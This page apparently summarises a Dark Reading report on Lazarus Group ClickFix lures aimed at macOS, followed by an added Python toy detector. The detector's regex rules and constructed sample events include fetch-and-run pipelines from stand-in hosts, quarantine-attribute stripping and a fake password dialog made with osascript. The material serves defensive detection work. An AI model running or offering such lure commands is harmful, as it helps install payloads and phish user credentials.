RC RANDOM CHAOS

Lazarus Group Pivots ClickFix Social Engineering to macOS Targets

via Dark Reading

Original source

North Korea's Lazarus Targets macOS Users via ClickFix

Dark Reading →

North Korea’s Lazarus Group has extended its ClickFix campaign to macOS, a technique it previously aimed at Windows users. ClickFix is pure social engineering: the victim lands on a fake error or verification page and is told to copy a command and paste it into Terminal to "fix" the problem. Because the victim runs the command themselves, the payload never passes through the browser. Gatekeeper only evaluates files carrying the quarantine attribute that a browser download sets; a script fetched with curl from a shell, or piped straight into sh, never gets that attribute, so the code-signing and notarization prompts that would otherwise deter running an unsigned binary never appear.

The shift matters because macOS has long been treated as a lower-priority target for user-driven execution attacks, and Lazarus has a track record of financially motivated intrusions against crypto firms, developers, and fintech personnel, groups that are overrepresented on Apple hardware. Security teams that assumed macOS endpoints were out of scope for this class of lure should revisit detection coverage for terminal-driven payload staging and clipboard-to-shell execution.

Defenders should treat any workflow that instructs a user to paste shell commands as hostile, regardless of browser or OS. The most direct countermeasures are EDR rules keyed to curl, base64 and osascript execution from interactive shells (a shell whose parent is Terminal or another terminal emulator), ideally correlated so that a download followed within seconds by a shell or interpreter spawn from the same shell is flagged, plus user training that teaches people to refuse copy-paste-to-terminal prompts.
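The detection logic described above, as an added example that is not from the Dark Reading article or any EDR vendor's rule set. It consumes process-execution events in an assumed schema (ts, pid, ppid, name, cmdline), identifies interactive shells by their terminal-emulator parent, applies single-command-line patterns (fetch piped to a shell, base64-decode piped to a shell, inline osascript, quarantine stripping via xattr), and correlates a curl/wget spawn with a shell or interpreter spawn from the same interactive shell within a short window. The sample events are constructed for illustration, not captured telemetry.

```python
"""Toy ClickFix detector for macOS process telemetry.

Added example, not code from the article or any product. The event schema
and the sample events are assumptions made for illustration.
"""
import re
from collections import defaultdict

TERMINALS = {"Terminal", "iTerm2", "Warp", "Alacritty", "kitty"}
SHELLS = {"bash", "sh", "zsh", "dash", "ksh"}
DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = SHELLS | {"osascript", "python3", "python", "perl"}
WINDOW_S = 5.0  # a fetch and an exec this close together are treated as one pipeline

# Patterns that already show fetch-and-execute inside a single command line
# (e.g. a lure that wraps everything in `bash -c "..."`).
INLINE_PATTERNS = {
    "inline_fetch_pipe_shell": re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:bash|sh|zsh)\b"),
    "inline_base64_pipe_shell": re.compile(r"\bbase64\b[^|]*(?:-d|-D|--decode)[^|]*\|\s*(?:bash|sh|zsh)\b"),
    "osascript_inline": re.compile(r"\bosascript\b.*\s-e\s"),
    "quarantine_strip": re.compile(r"\bxattr\b.*(?:\s-c\b|com\.apple\.quarantine)"),
}


def interactive_shells(events):
    """Return pids of shells whose parent is a terminal emulator, i.e. where a human typed or pasted."""
    by_pid = {e["pid"]: e for e in events}
    return {e["pid"] for e in events
            if e["name"] in SHELLS and by_pid.get(e["ppid"], {}).get("name") in TERMINALS}


def detect(events):
    """Return (rule_name, pid) findings for events descending from an interactive shell."""
    findings = []
    shells = interactive_shells(events)
    by_pid = {e["pid"]: e for e in events}

    def interactive_root(e):
        # Walk up the ancestry until an interactive shell is found, or the chain ends.
        cur = e
        while cur is not None:
            if cur["pid"] in shells:
                return cur["pid"]
            cur = by_pid.get(cur["ppid"])
        return None

    children = defaultdict(list)
    for e in events:
        root = interactive_root(e)
        if root is None:
            continue  # launchd/GUI-spawned; out of scope for this interactive-shell rule set
        for rule, rx in INLINE_PATTERNS.items():
            if rx.search(e["cmdline"]):
                findings.append((rule, e["pid"]))
        children[root].append(e)

    # Pipeline correlation: `curl ... | bash` shows up as two sibling processes
    # of the interactive shell, spawned at nearly the same time.
    for root, kids in children.items():
        fetches = [k for k in kids if k["name"] in DOWNLOADERS and "http" in k["cmdline"]]
        execs = [k for k in kids if k["name"] in INTERPRETERS and k["ppid"] == root]
        for f in fetches:
            if any(abs(x["ts"] - f["ts"]) <= WINDOW_S for x in execs):
                findings.append(("fetch_then_exec", f["pid"]))
    return findings


# Constructed sample: a pasted ClickFix one-liner, the script it runs, and two benign-looking events.
SAMPLE_EVENTS = [
    {"ts": 0.0, "pid": 100, "ppid": 1, "name": "Terminal", "cmdline": "Terminal"},
    {"ts": 0.1, "pid": 101, "ppid": 100, "name": "zsh", "cmdline": "-zsh"},
    {"ts": 10.0, "pid": 102, "ppid": 101, "name": "curl", "cmdline": "curl -fsSL https://example.invalid/verify.sh"},
    {"ts": 10.0, "pid": 103, "ppid": 101, "name": "bash", "cmdline": "bash"},
    {"ts": 11.0, "pid": 104, "ppid": 103, "name": "xattr", "cmdline": "xattr -c /tmp/.u"},
    {"ts": 11.5, "pid": 105, "ppid": 103, "name": "osascript",
     "cmdline": "osascript -e 'display dialog \"System Update\" default answer \"\" with hidden answer'"},
    {"ts": 60.0, "pid": 200, "ppid": 101, "name": "curl", "cmdline": "curl -s https://api.example.invalid/health"},
    {"ts": 300.0, "pid": 300, "ppid": 1, "name": "sh", "cmdline": "sh -c 'curl -s https://updates.example.invalid/x | sh'"},
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:28s} pid={pid}")
```

The lone `curl` health check at pid 200 produces no finding because no interpreter follows it, and the launchd-spawned `sh -c 'curl ... | sh'` at pid 300 is deliberately outside this rule set because it has no terminal ancestor; a production ruleset would cover that path with a separate, non-interactive rule and a lower severity. The 5-second window is a tuning assumption, not a value from the article.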

Read the full article

Continue reading at Dark Reading →

This is an AI-generated summary. Read the original for the full story.